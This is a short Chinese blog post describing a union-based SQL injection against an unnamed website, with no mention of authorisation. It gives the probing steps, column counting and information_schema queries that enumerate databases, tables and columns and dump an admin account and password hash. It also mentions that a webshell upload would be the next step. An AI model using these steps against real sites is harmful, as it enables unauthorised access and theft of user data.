一次简单SQL注入

本文详细描述了一次SQL注入攻击的过程,从利用id大法判断注入点,到确认MySQL数据库并探测版本,再到遍历数据库、表名及字段。作者展示了如何通过SQL查询获取数据库信息,并尝试爆破用户数据,但由于密码哈希加密复杂,渗透测试在此阶段停止。文章突出了SQL注入的安全风险和数据库信息泄露的潜在危害。
摘要由CSDN通过智能技术生成

一次简单SQL注入

id大法 遇见id= 上去一个单引号 报错,

回显判断是MySQL数据库  and 1=1正常   and 1=2 不正常

数字型注入点没错了,还没有WAF  开始下手

order by 判断当前注入点有25个字段 回显 2 和 10

用database()替换2  version()替换10  开始爆当前数据库和版本

 

得到当前数据库跟版本,替换查询语句开始查询所有数据库 查询到只有两个库

SELECT group_concat(schema_name) from information_schema.schemata

 

 

开始爆当前数据库所有表名

SELECT group_concat(table_name) from information_schema.tables where table_schema='库名'

注意:库名跟表名都需要16进制加密

一眼望过去只有user表入我的法眼  开始爆user表里所有字段

SELECT group_concat(column_name) from information_schema.columns where table_name='表名'

 

开始爆字段内容

select group_concat(column_name) from information_schema.columns where table_name=表名

这里精简为:select group_concat(字段) from user

账户admin出来了 开始爆密码(替换name字段就行)

这里的admin和这段加密的密码很有可能是后台的账户

在此之前已经通过扫描器找到了他的后台  

但是这段哈希值是密码为程序员自定义的哈希加密,

破解非常非常麻烦(需撞库)所以到此就结束了

如果这里密码能解密应该就能直接登录后台进行下一步渗透  上传拿webshell等

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值